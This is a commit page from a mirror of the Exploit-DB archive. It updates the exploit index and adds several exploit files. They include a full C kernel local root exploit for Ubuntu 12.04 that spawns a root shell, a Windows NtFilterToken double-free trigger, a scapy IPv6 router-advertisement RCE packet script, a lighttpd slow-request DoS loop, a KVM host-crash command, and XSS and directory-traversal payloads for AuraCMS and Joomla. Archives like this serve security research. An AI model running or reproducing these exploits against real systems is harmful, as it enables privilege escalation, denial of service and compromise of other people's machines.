bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_02_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-02 04:37:23 +00:00
parent a6e4c23628
commit 46fb11d33b
8 changed files with 418 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
@ -17181,7 +17181,7 @@ id,file,description,date,author,platform,type,port
19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,metasploit,windows,remote,888
19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme Email Spoofing",2012-07-16,bwall,php,webapps,0
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel h0wl Wylecial",php,webapps,0
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 - CMS Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0
@ -23212,7 +23212,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@ -30227,6 +30227,7 @@ id,file,description,date,author,platform,type,port
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (msf)",2014-05-28,j0sm1,multiple,dos,5247
33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80
33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 'failurl' Parameter HTTP Response Splitting Vulnerability",2010-01-21,Trancer,php,webapps,0
@ -30257,5 +30258,11 @@ id,file,description,date,author,platform,type,port
33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0
33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0
33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0
33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0

Can't render this file because it is too large.

15
platforms/linux/dos/33591.sh Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/38036/info
The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.
##slow_test.sh
for ((j=0;j<1000;j++)) do
for ((i=0; i<50; i++)) do
## slow_client is a C program which sends a HTTP request very slowly
./slow_client http://www.example.com/>/dev/null 2>/dev/null &
done&
sleep 3
done

12
platforms/linux/dos/33592.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38038/info
The Linux kernel is prone to a local denial-of-service vulnerability that affects the Kernel-based Virtual Machine (KVM).
Attackers with local access to a guest operating system can exploit this issue to crash the host operating system.
Successful exploits will deny service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
The following example command is available:
cat /dev/port

133
platforms/linux/local/33589.c Executable file
View file

@ -0,0 +1,133 @@
/**
* Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit
* by Vitaly Nikolenko (vnik5287@gmail.com)
*
* based on semtex.c by sd
*
* Supported targets:
* [0] Ubuntu 12.04.0 - 3.2.0-23-generic
* [1] Ubuntu 12.04.1 - 3.2.0-29-generic
* [2] Ubuntu 12.04.2 - 3.5.0-23-generic
*
* $ gcc vnik.c -O2 -o vnik
*
* $ uname -r
* 3.2.0-23-generic
*
* $ ./vnik 0
*/
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>
#define BASE 0x1780000000
#define SIZE 0x0010000000
#define KSIZE 0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
uint64_t targets[3][3] =
{{0xffffffff81ef67e0, // perf_swevent_enabled
0xffffffff81091630, // commit_creds
0xffffffff810918e0}, // prepare_kernel_cred
{0xffffffff81ef67a0,
0xffffffff81091220,
0xffffffff810914d0},
{0xffffffff81ef5940,
0xffffffff8107ee30,
0xffffffff8107f0c0}
};
void __attribute__((regparm(3))) payload() {
uint32_t *fixptr = (void*)AB(1);
// restore the handler
*fixptr = -1;
commit_creds_fn commit_creds = (commit_creds_fn)AB(2);
prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
void trigger(uint32_t off) {
uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };
int fd = syscall(298, buf, 0, -1, -1, 0);
assert( !close(fd) );
}
int main(int argc, char **argv) {
uint64_t off64, needle, kbase, *p;
uint8_t *code;
uint32_t int_n, j = 5, target = 1337;
int offset = 0;
void *map;
assert(argc == 2 && "target?");
assert( (target = atoi(argv[1])) < 3 );
struct {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)) idt;
// mmap user-space block so we don't page fault
// on sw_perf_event_destroy
assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
memset(map, 0, SIZE);
asm volatile("sidt %0" : "=m" (idt));
kbase = idt.addr & 0xff000000;
printf("IDT addr = 0x%lx\n", idt.addr);
assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);
memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
// can only play with interrupts 3, 4 and 0x80
for (int_n = 3; int_n <= 0x80; int_n++) {
for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {
int off32 = off64;
if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {
offset = off32;
goto out;
}
}
if (int_n == 4) {
// shit, let's try 0x80 if the kernel is compiled with
// CONFIG_IA32_EMULATION
int_n = 0x80 - 1;
}
}
out:
assert(offset);
printf("Using int = %d with offset = %d\n", int_n, offset);
for (j = 0; j < 3; j++) {
needle = AB(j+1);
assert(p = memmem(code, 1024, &needle, 8));
*p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];
}
trigger(offset);
switch (int_n) {
case 3:
asm volatile("int $0x03");
break;
case 4:
asm volatile("int $0x04");
break;
case 0x80:
asm volatile("int $0x80");
}
assert(!setuid(0));
return execl("/bin/bash", "-sh", NULL);
}

86
platforms/php/webapps/33555.txt Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :http://auracms.org/
# Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master
# Vuln Category: CWE-79 (XSS) - CWE-98 (LFI)
# Tested on: AuraCMS 3.0
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.
---------------------------
Technical Details
---------------------------
1) Reflected XSS : FileManager is a parameter unfiltered view of the file.
Ex: filemanager.php?viewdir="><script>alert('Mustafa');</script>
2) LFI (Local File Include) : Directory listing is done.
Ex : filemanager.php?viewdir=/home
---------------------------------------------------------------------------------
# filemanager.php (Between 263,311 line)
Example : domain.com/auracms/filemanager.php?viewdir=request
280 line : <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
Example 2 : domain.com/auracms/filemanager.php?viewdir="><script>alert("mustafa");</script>
<input type="hidden" value="<script>alert("mustafa");</script>" name="return" />
Example 3 : domain.com/auracms/filemanager.php?viewdir=<script>alert("mustafa");</script>
<input type="hidden" value=" "><script>alert("mustafa");</script>" name="return" /> Bingooo :)
<?php
if(isset($_GET['viewdir'])) {
?>
<ul id="browser-toolbar">
<li class="file-new"><a href="#" title="<?php echo $lng['new_file_title']; ?>" onclick="toggle_visibility('load-file'); return false;"><?php echo $lng['new_file']; ?></a></li>
<li class="folder-new"><a href="#" title="<?php echo $lng['new_folder_title']; ?>" onclick="create_folder('<?php echo $_GET['viewdir']; ?>'); return false;"><?php echo $lng['new_folder']; ?></a></li>
<li class="folder-delete"><a href="#" title="<?php echo $lng['delete_folder_title']; ?>" onclick="delete_folder('<?php echo $_GET['viewdir']; ?>');"><?php echo $lng['delete_folder']; ?></a></li>
<li class="file-refresh"><a href="#" title="<?php echo $lng['refresh_files_title']; ?>" onclick="load('filemanager.php?viewdir=<?php echo $_GET['viewdir']; ?>','view-files'); return false;"><?php echo $lng['refresh']; ?></a></li>
</ul>
<div id="current-loction">
<?php echo htmlspecialchars($root_path . '/' . $_GET['viewdir'] . '/'); ?>
</div>
<form style="display: none;" id="load-file" action="" class="load-file" method="post" enctype="multipart/form-data">
<fieldset>
<legend><?php echo $lng['new_file_title']; ?></legend>
<input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
<label><?php echo $lng['form_file']; ?><input type="file" name="new_file" /></label>
</fieldset>
<fieldset>
<legend><?php echo $lng['new_file_manipulations']; ?></legend>
<table>
<tr>
<td><label for="new_resize"><?php echo $lng['form_width']; ?></label></td>
<td><input type="text" class="number" maxlength="4" id="new_resize" name="new_resize" value="" /> px</td>
</tr>
<tr>
<td><label for="new_rotate"><?php echo $lng['form_rotate']; ?></label></td>
<td>
<select id="new_rotate" name="new_rotate">
<option value="0"></option>
<option value="90">90</option>
<option value="180">180</option>
<option value="270">270</option>
</select>
</td>
</tr>
<tr>
<td></td>
<td><input type="checkbox" class="checkbox" id="new_greyscale" name="new_greyscale" /><label for="new_greyscale"><?php echo $lng['form_greyscale']; ?></label></td>
</tr>
</table>
</fieldset>
<input type="submit" id="insert" value="<?php echo $lng['form_submit']; ?>" />
</form>
<?php } ?>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com

9
platforms/php/webapps/33590.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38034/info
The AutartiTarot component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
NOTE: Successful exploitation requires having 'Public Back-end' group credentials.
http://www.example.com/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT]

135
platforms/windows/local/33593.c Executable file
View file

@ -0,0 +1,135 @@
source: http://www.securityfocus.com/bid/38044/info
Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
// --------------------------------------------------------
// Windows NtFilterToken() Double Free Vulnerability
// ----------------------------- taviso@sdf.lonestar.org ------------
//
// INTRODUCTION
//
// NtFilterToken() will jump to a cleanup routine if it failed to capture
// the arguments specified due to pathological TOKEN_GROUP parameter. This
// cleanup routine assumes a pointer passed to SeCaptureSidAndAttributesArray()
// will be NULL if it fails, and attempts to release it otherwise.
//
// Unfortunately there is a codepath where SeCaptureSidAndAttributesArray()
// allocates a buffer, releases it on error, but then does not set it to
// NULL. This causes NtFilterToken() to incorrectly free it again.
//
// IMPACT
//
// This is probably exploitable (at least on MP kernels) to get ring0 code
// execution, but you would have to get the released buffer re-allocated
// during a very small window and you only get one attempt (the kernel
// will bugcheck if you dont win the race).
//
// Although technically this is a local privilege escalation, I don't think
// it's possible to create a reliable exploit. Therefore, It's probably
// safe to treat this as if it were a denial of service.
//
// Interestingly, Microsoft are big proponents of static analysis and this
// seems like a model example of a statically discoverable bug. I would
// guess they're dissapointed they missed this one, it would be fun to
// know what went wrong.
//
// This vulnerability was reported to Microsoft in October, 2009.
//
// CREDIT
//
// This bug was discovered by Tavis Ormandy <taviso@sdf.lonestar.org>.
//
#include <windows.h>
PVOID AllocBufferOnPageBoundary(ULONG Size);
int main(int argc, char **argv)
{
SID *Sid;
HANDLE NewToken;
FARPROC NtFilterToken;
PTOKEN_GROUPS Restricted;
// Resolve the required routine.
NtFilterToken = GetProcAddress(GetModuleHandle("NTDLL"), "NtFilterToken");
// Allocate SID such that touching the following byte will AV.
Sid = AllocBufferOnPageBoundary(sizeof(SID));
Restricted = AllocBufferOnPageBoundary(sizeof(PTOKEN_GROUPS) + sizeof(SID_AND_ATTRIBUTES));
// Setup SID, SubAuthorityCount is the important field.
Sid->Revision = SID_REVISION;
Sid->SubAuthority[0] = SECURITY_NULL_RID;
Sid->SubAuthorityCount = 2;
// Respect my authority.
CopyMemory(Sid->IdentifierAuthority.Value, "taviso", sizeof Sid->IdentifierAuthority.Value);
// Setup the TOKEN_GROUPS structure.
Restricted->Groups[0].Attributes = SE_GROUP_MANDATORY;
Restricted->Groups[0].Sid = Sid;
Restricted->GroupCount = 1;
// Trigger the vulnerabilty.
NtFilterToken(INVALID_HANDLE_VALUE,
0,
NULL,
NULL,
Restricted,
&NewToken);
// Not reached
return 0;
}
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
// This is a quick routine to allocate a buffer on a page boundary. Simply
// VirtualAlloc() two consecutive pages read/write, then use VirtualProtect()
// to set the second page to PAGE_NOACCESS.
//
// sizeof(buffer)
// |
// <-+->
// +----------------+----------------+
// | PAGE_READWRITE | PAGE_NOACCESS |
// +----------------+----------------+
// ^ ^
// | |
// buffer[0] -+ +- buffer[size]
//
// No error checking for simplicity, whatever :-)
//
PVOID AllocBufferOnPageBoundary(ULONG Size)
{
ULONG GuardBufSize;
ULONG ProtBits;
PBYTE GuardBuf;
// Round size requested up to the next multiple of PAGE_SIZE
GuardBufSize = (Size + (PAGE_SIZE - 1)) & ~(PAGE_SIZE - 1);
// Add one page to be the guard page
GuardBufSize = GuardBufSize + PAGE_SIZE;
// Map this anonymous memory
GuardBuf = VirtualAlloc(NULL,
GuardBufSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
// Make the final page NOACCESS
VirtualProtect(GuardBuf + GuardBufSize - PAGE_SIZE,
PAGE_SIZE,
PAGE_NOACCESS,
&ProtBits);
// Calculate where pointer should be, so that touching Buffer[Size] AVs.
return GuardBuf + GuardBufSize - PAGE_SIZE - Size;
}

17
platforms/windows/remote/33594.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/38061/info
Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
v6_dst = "<IPv6 address>"
mac_dst = "<Mac address>"
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)
l=fragment6(pkt, 1500)
for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")